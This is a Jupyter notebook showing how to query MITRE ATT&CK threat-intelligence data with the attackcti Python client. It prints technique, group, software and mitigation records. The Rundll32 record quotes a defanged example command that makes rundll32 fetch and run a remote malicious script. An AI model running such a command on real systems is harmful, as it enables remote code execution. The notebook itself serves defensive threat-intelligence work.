{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# **MITRE ATT&CK API FILTERS**: Python Client\n", "------------------" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Import ATTACK API Client" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [], "source": [ "from attackcti import attack_client" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Import Extra Libraries" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [], "source": [ "from pandas import *\n", "from pandas.io.json import json_normalize" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Initialize ATT&CK Client Variable" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [], "source": [ "lift = attack_client()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Technique by Name (TAXII)\n", "You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive." ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [], "source": [ "technique_name = lift.get_technique_by_name('Rundll32')" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[{'type': 'attack-pattern',\n", " 'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5',\n", " 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n", " 'created': '2017-05-31 21:31:06.045000+00:00',\n", " 'modified': '2018-10-17 00:14:20.652000+00:00',\n", " 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n", " 'url': 'https://attack.mitre.org/techniques/T1085',\n", " 'matrix': 'mitre-attack',\n", " 'technique': 'Rundll32',\n", " 'technique_description': 'The rundll32.exe program can be called to execute an arbitrary binary. 
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\\n\\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\\\..\\\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)',\n", " 'technique_detection': 'Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. 
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.',\n", " 'tactic': ['defense-evasion', 'execution'],\n", " 'technique_id': 'T1085',\n", " 'capec_id': None,\n", " 'capec_url': None,\n", " 'platform': ['Windows'],\n", " 'data_sources': ['File monitoring',\n", " 'Process monitoring',\n", " 'Process command-line parameters',\n", " 'Binary file metadata'],\n", " 'defense_bypassed': ['Anti-virus', 'Application whitelisting'],\n", " 'permissions_required': ['User'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': False,\n", " 'contributors': ['Ricardo Dias', 'Casey Smith'],\n", " 'technique_references': ['https://attack.mitre.org/techniques/T1085',\n", " 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf',\n", " 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}]" ] }, "execution_count": 5, "metadata": {}, "output_type": "execute_result" } ], "source": [ "technique_name" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Data Sources from All Techniques (TAXII)\n", "* You can also get all the data sources available in ATT&CK\n", "* Currently the only techniques with data sources are the ones in Enterprise ATT&CK." 
] }, { "cell_type": "code", "execution_count": 6, "metadata": {}, "outputs": [], "source": [ "data_sources = lift.get_all_data_sources()" ] }, { "cell_type": "code", "execution_count": 7, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "50" ] }, "execution_count": 7, "metadata": {}, "output_type": "execute_result" } ], "source": [ "len(data_sources)" ] }, { "cell_type": "code", "execution_count": 8, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['data loss prevention',\n", " 'mail server',\n", " 'named pipes',\n", " 'application logs',\n", " 'netflow/enclave netflow',\n", " 'sensor health and status',\n", " 'mbr',\n", " 'wmi objects',\n", " 'process use of network',\n", " 'disk forensics',\n", " 'services',\n", " 'asset management',\n", " 'network protocol analysis',\n", " 'network intrusion detection system',\n", " 'windows registry',\n", " 'detonation chamber',\n", " 'process command-line parameters',\n", " 'packet capture',\n", " 'environment variable',\n", " 'anti-virus',\n", " 'malware reverse engineering',\n", " 'ssl/tls inspection',\n", " 'windows error reporting',\n", " 'web logs',\n", " 'kernel drivers',\n", " 'digital certificate logs',\n", " 'authentication logs',\n", " 'user interface',\n", " 'powershell logs',\n", " 'third-party application logs',\n", " 'bios',\n", " 'web application firewall logs',\n", " 'host network interface',\n", " 'vbr',\n", " 'dll monitoring',\n", " 'network device logs',\n", " 'browser extensions',\n", " 'file monitoring',\n", " 'process monitoring',\n", " 'email gateway',\n", " 'access tokens',\n", " 'binary file metadata',\n", " 'efi',\n", " 'web proxy',\n", " 'api monitoring',\n", " 'windows event logs',\n", " 'system calls',\n", " 'component firmware',\n", " 'loaded dlls',\n", " 'dns records']" ] }, "execution_count": 8, "metadata": {}, "output_type": "execute_result" } ], "source": [ "data_sources" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Any STIX Object by ID (TAXII)\n", "* 
You can get any STIX object by its id across all the matrices. It is case sensitive.\n", "* You can use the following STIX Object Types:\n", " * attack-pattern > techniques\n", " * course-of-action > mitigations\n", " * intrusion-set > groups\n", " * malware\n", " * tool" ] }, { "cell_type": "code", "execution_count": 9, "metadata": {}, "outputs": [], "source": [ "object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')" ] }, { "cell_type": "code", "execution_count": 10, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[{'type': 'attack-pattern',\n", " 'id': 'attack-pattern--286cc500-4291-45c2-99a1-e760db176402',\n", " 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n", " 'created': '2017-12-14 16:46:06.044000+00:00',\n", " 'modified': '2018-10-17 00:14:20.652000+00:00',\n", " 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n", " 'url': 'https://attack.mitre.org/techniques/T1307',\n", " 'matrix': 'mitre-pre-attack',\n", " 'technique': 'Acquire and/or use 3rd party infrastructure services',\n", " 'technique_description': 'A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. 
(Citation: LUCKYCAT2012)',\n", " 'technique_detection': None,\n", " 'tactic': ['adversary-opsec'],\n", " 'technique_id': 'T1307',\n", " 'capec_id': None,\n", " 'capec_url': None,\n", " 'platform': None,\n", " 'data_sources': None,\n", " 'defense_bypassed': None,\n", " 'permissions_required': None,\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': None,\n", " 'technique_references': ['https://attack.mitre.org/techniques/T1307',\n", " 'LUCKYCAT2012'],\n", " 'detectable_by_common_defenses': 'No',\n", " 'detectable_explanation': '3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.',\n", " 'difficulty_for_adversary': 'Yes',\n", " 'difficulty_explanation': 'Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.',\n", " 'tactic_type': None}]" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "object_by_id" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Any Group by Alias (TAXII)\n", "You can get any Group by its Alias property across all the matrices. It is case sensitive." 
] }, { "cell_type": "code", "execution_count": 11, "metadata": {}, "outputs": [], "source": [ "group_name = lift.get_group_by_alias('Cozy Bear')" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[{'type': 'intrusion-set',\n", " 'id': 'intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542',\n", " 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n", " 'matrix': 'mitre-attack',\n", " 'created': '2017-05-31 21:31:52.748000+00:00',\n", " 'modified': '2018-10-17 00:14:20.652000+00:00',\n", " 'url': 'https://attack.mitre.org/groups/G0016',\n", " 'group': 'APT29',\n", " 'group_description': '[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)',\n", " 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'],\n", " 'group_id': 'G0016',\n", " 'group_references': ['https://attack.mitre.org/groups/G0016',\n", " 'APT29',\n", " 'The Dukes',\n", " 'Cozy Bear',\n", " 'CozyDuke',\n", " 'https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf',\n", " 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/',\n", " 'https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf']}]" ] }, "execution_count": 12, "metadata": {}, "output_type": "execute_result" } ], "source": [ "group_name" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Relationships by Any Object (TAXII)\n", "* You can get specific relationships defined in ATT&CK for specific objects across all the matrices.\n", "* The valid options are: **groups**, **software** and **mitigations**\n", "* This function collects all the relationships 
available in ATT&CK via the **get_all_relationships()** function. Then, depending on the specific stix object requested, the information is filtered.\n", "* The function enriches the output of **get_all_relationships()** by adding more context to the **source object** defined in the **Relationships stix object**.\n", "* You get more information about the source and also keep the **target object** id so that you can then map the results to the target stix object." ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [], "source": [ "relationships = lift.get_relationships_by_object('software')" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'target_object': 'attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f',\n", " 'relationship_id': 'relationship--66440b92-cfed-441c-85fd-1d103684a187',\n", " 'relationship': 'uses',\n", " 'relationship_description': '[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.',\n", " 'software_type': 'tool',\n", " 'matrix': 'mitre-attack',\n", " 'software': 'Koadic',\n", " 'software_description': '[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. 
(Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)',\n", " 'software_labels': ['tool'],\n", " 'software_id': 'S0250',\n", " 'url': 'https://attack.mitre.org/software/S0250',\n", " 'software_aliases': ['Koadic'],\n", " 'software_references': ['https://attack.mitre.org/software/S0250',\n", " 'Koadic',\n", " 'https://github.com/zerosum0x0/koadic',\n", " 'https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/'],\n", " 'software_platform': ['Windows']}" ] }, "execution_count": 14, "metadata": {}, "output_type": "execute_result" } ], "source": [ "relationships[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get All Techniques with Mitigations (TAXII)\n", "The difference with this function and **get_all_techniques()** is that **get_all_techniques_with_mitigations** returns (of course haha) mitigations mapped to their respective techniques. This is useful for when you want to gather mitigations and techniques all at once." ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [], "source": [ "complete_techniques = lift.get_all_techniques_with_mitigations()" ] }, { "cell_type": "code", "execution_count": 16, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'mitigation': 'Account Manipulation Mitigation',\n", " 'mitigation_description': 'Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).\\n\\nProtect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. 
Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.',\n", " 'mitigation_references': ['https://attack.mitre.org/techniques/T1098'],\n", " 'technique': 'Account Manipulation',\n", " 'technique_description': 'Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.',\n", " 'technique_detection': 'Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. 
(Citation: GitHub Mimikatz Issue 92 June 2017)\\n\\nUse of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.',\n", " 'tactic': ['credential-access', 'persistence'],\n", " 'url': 'https://attack.mitre.org/techniques/T1098',\n", " 'technique_id': 'T1098',\n", " 'capec_id': None,\n", " 'capec_url': None,\n", " 'platform': ['Windows'],\n", " 'data_sources': ['Authentication logs',\n", " 'API monitoring',\n", " 'Windows event logs',\n", " 'Packet capture'],\n", " 'defense_bypassed': None,\n", " 'permissions_required': ['Administrator'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': ['Tim MalcomVetter'],\n", " 'technique_references': ['https://attack.mitre.org/techniques/T1098',\n", " 'https://docs.microsoft.com/windows/device-security/auditing/event-4738',\n", " 'https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM',\n", " 'https://github.com/gentilkiwi/mimikatz/issues/92'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "complete_techniques[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Techniques Used by Software (TAXII)\n", "If you do not provide the name of a specific **Software** (Case Sensitive), the function returns information about every piece of software across all the matrices." 
] }, { "cell_type": "code", "execution_count": 17, "metadata": {}, "outputs": [], "source": [ "software_techniques = lift.get_techniques_used_by_software('BITSAdmin')" ] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_id': 'relationship--9edfa8b5-2e9f-4022-93b2-fd819156fe95',\n", " 'target_object': 'attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add',\n", " 'relationship_description': '[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.',\n", " 'relationship': 'uses',\n", " 'software': 'BITSAdmin',\n", " 'software_description': '[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)',\n", " 'software_labels': ['tool'],\n", " 'software_id': 'S0190',\n", " 'software_aliases': ['BITSAdmin'],\n", " 'software_references': ['https://attack.mitre.org/software/S0190',\n", " 'https://msdn.microsoft.com/library/aa362813.aspx'],\n", " 'software_platform': ['Windows'],\n", " 'technique': 'Remote File Copy',\n", " 'technique_description': 'Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). 
Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\\n\\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).',\n", " 'technique_detection': 'Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\\n\\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)',\n", " 'tactic': ['command-and-control', 'lateral-movement'],\n", " 'url': 'https://attack.mitre.org/techniques/T1105',\n", " 'technique_id': 'T1105',\n", " 'capec_id': None,\n", " 'capec_url': None,\n", " 'platform': ['Linux', 'macOS', 'Windows'],\n", " 'data_sources': ['File monitoring',\n", " 'Packet capture',\n", " 'Process use of network',\n", " 'Netflow/Enclave netflow',\n", " 'Network protocol analysis',\n", " 'Process monitoring'],\n", " 'defense_bypassed': None,\n", " 'permissions_required': ['User'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': True,\n", " 'remote_support': None,\n", " 'contributors': None,\n", " 'technique_references': ['https://attack.mitre.org/techniques/T1105',\n", " 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 18, "metadata": {}, "output_type": "execute_result" } ], "source": [ "software_techniques[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Techniques Used by Group (TAXII)\n", "If you do not provide the name of a specific **Group** (Case Sensitive), the function returns information about all the groups available across all the matrices." 
] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [], "source": [ "group_techniques = lift.get_techniques_used_by_group('APT29')" ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_id': 'relationship--410f6714-cd02-4253-b324-a8ac15e70bca',\n", " 'target_object': 'attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38',\n", " 'relationship_description': '[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing with an attachment to deliver files with exploits to initial victims.',\n", " 'relationship': 'uses',\n", " 'group': 'APT29',\n", " 'group_description': '[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)',\n", " 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'],\n", " 'group_id': 'G0016',\n", " 'group_references': ['https://attack.mitre.org/groups/G0016',\n", " 'APT29',\n", " 'The Dukes',\n", " 'Cozy Bear',\n", " 'CozyDuke',\n", " 'https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf',\n", " 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/',\n", " 'https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'],\n", " 'technique': 'Spearphishing Attachment',\n", " 'technique_description': \"Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. 
In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\\n\\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\",\n", " 'technique_detection': \"Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\\n\\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. 
Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).\",\n", " 'tactic': ['initial-access'],\n", " 'url': 'https://attack.mitre.org/techniques/T1193',\n", " 'technique_id': 'T1193',\n", " 'capec_id': ['CAPEC-163'],\n", " 'capec_url': ['https://capec.mitre.org/data/definitions/163.html'],\n", " 'platform': ['Windows', 'macOS', 'Linux'],\n", " 'data_sources': ['File monitoring',\n", " 'Packet capture',\n", " 'Network intrusion detection system',\n", " 'Detonation chamber',\n", " 'Email gateway',\n", " 'Mail server'],\n", " 'defense_bypassed': None,\n", " 'permissions_required': None,\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': None,\n", " 'technique_references': ['https://attack.mitre.org/techniques/T1193',\n", " 'https://capec.mitre.org/data/definitions/163.html'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 20, "metadata": {}, "output_type": "execute_result" } ], "source": [ "group_techniques[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Software Used by Group (TAXII)\n", "If you do not provide the name of a specific Group, it returns information about all the groups available across all the matrices." 
] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [], "source": [ "group_software = lift.get_software_used_by_group('APT12')" ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_description': None,\n", " 'group': 'APT12',\n", " 'group_description': '[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n", " 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n", " 'group_id': 'G0005',\n", " 'group_references': ['https://attack.mitre.org/groups/G0005',\n", " 'APT12',\n", " 'IXESHE',\n", " 'DynCalc',\n", " 'Numbered Panda',\n", " 'DNSCALC',\n", " 'http://www.crowdstrike.com/blog/whois-numbered-panda/',\n", " 'https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html'],\n", " 'software_url': 'https://attack.mitre.org/software/S0015',\n", " 'software': 'Ixeshe',\n", " 'software_description': '[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since 2009 to attack targets in East Asia. 
(Citation: Moran 2013)',\n", " 'software_labels': ['malware'],\n", " 'software_id': 'S0015',\n", " 'software_aliases': ['Ixeshe'],\n", " 'software_references': ['https://attack.mitre.org/software/S0015',\n", " 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n", " 'software_platform': ['Windows']}" ] }, "execution_count": 22, "metadata": {}, "output_type": "execute_result" } ], "source": [ "group_software[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Everything Used by Group (TAXII)\n", "* This function does not provide techniques defined for each Software that was used by group.\n", "* The information returned covers techniques that were used by a group and the name and description of software.\n", "* If you do not provide the name of a specific **Group**, it returns information about all the groups available across all the matrices." ] }, { "cell_type": "code", "execution_count": 23, "metadata": {}, "outputs": [], "source": [ "all_used_by_group = lift.get_all_used_by_group('APT12')" ] }, { "cell_type": "code", "execution_count": 24, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_description': None,\n", " 'group': 'APT12',\n", " 'group_description': '[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. 
(Citation: Meyers Numbered Panda)',\n", " 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n", " 'group_id': 'G0005',\n", " 'group_references': ['https://attack.mitre.org/groups/G0005',\n", " 'APT12',\n", " 'IXESHE',\n", " 'DynCalc',\n", " 'Numbered Panda',\n", " 'DNSCALC',\n", " 'http://www.crowdstrike.com/blog/whois-numbered-panda/',\n", " 'https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html'],\n", " 'software_url': 'https://attack.mitre.org/software/S0015',\n", " 'software': 'Ixeshe',\n", " 'software_description': '[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)',\n", " 'software_labels': ['malware'],\n", " 'software_id': 'S0015',\n", " 'software_aliases': ['Ixeshe'],\n", " 'software_references': ['https://attack.mitre.org/software/S0015',\n", " 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n", " 'software_platform': ['Windows']}" ] }, "execution_count": 24, "metadata": {}, "output_type": "execute_result" } ], "source": [ "all_used_by_group[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get All ATT&CK (TAXII)\n", "* This function collects everything from the ATT&CK framework and presents it as a long list of dictionaries making it easy to display the results as a table unlike the **get_all_stix_objects()** function that returns a dictionary.\n", "* It collects all the information from the following functions:\n", " * **get_all_techniques_with_mitigations()**\n", " * **get_all_software()**\n", " * **get_techniques_used_by_software()**\n", " * **get_all_groups()**\n", " * **get_all_used_by_group()**" ] }, { "cell_type": "code", "execution_count": 25, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "CPU times: user 18.3 s, sys: 402 ms, total: 18.7 s\n", "Wall 
time: 30.3 s\n" ] } ], "source": [ "%time all_attack_framework = lift.get_all_attack()" ] }, { "cell_type": "code", "execution_count": 26, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "list" ] }, "execution_count": 26, "metadata": {}, "output_type": "execute_result" } ], "source": [ "type(all_attack_framework)" ] }, { "cell_type": "code", "execution_count": 27, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'mitigation': 'Account Manipulation Mitigation',\n", " 'mitigation_description': 'Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).\\n\\nProtect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.',\n", " 'mitigation_references': ['https://attack.mitre.org/techniques/T1098'],\n", " 'technique': 'Account Manipulation',\n", " 'technique_description': 'Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.',\n", " 'technique_detection': 'Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. 
(Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)\\n\\nUse of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.',\n", " 'tactic': ['credential-access', 'persistence'],\n", " 'url': 'https://attack.mitre.org/techniques/T1098',\n", " 'technique_id': 'T1098',\n", " 'capec_id': None,\n", " 'capec_url': None,\n", " 'platform': ['Windows'],\n", " 'data_sources': ['Authentication logs',\n", " 'API monitoring',\n", " 'Windows event logs',\n", " 'Packet capture'],\n", " 'defense_bypassed': None,\n", " 'permissions_required': ['Administrator'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': ['Tim MalcomVetter'],\n", " 'technique_references': ['https://attack.mitre.org/techniques/T1098',\n", " 'https://docs.microsoft.com/windows/device-security/auditing/event-4738',\n", " 'https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM',\n", " 'https://github.com/gentilkiwi/mimikatz/issues/92'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 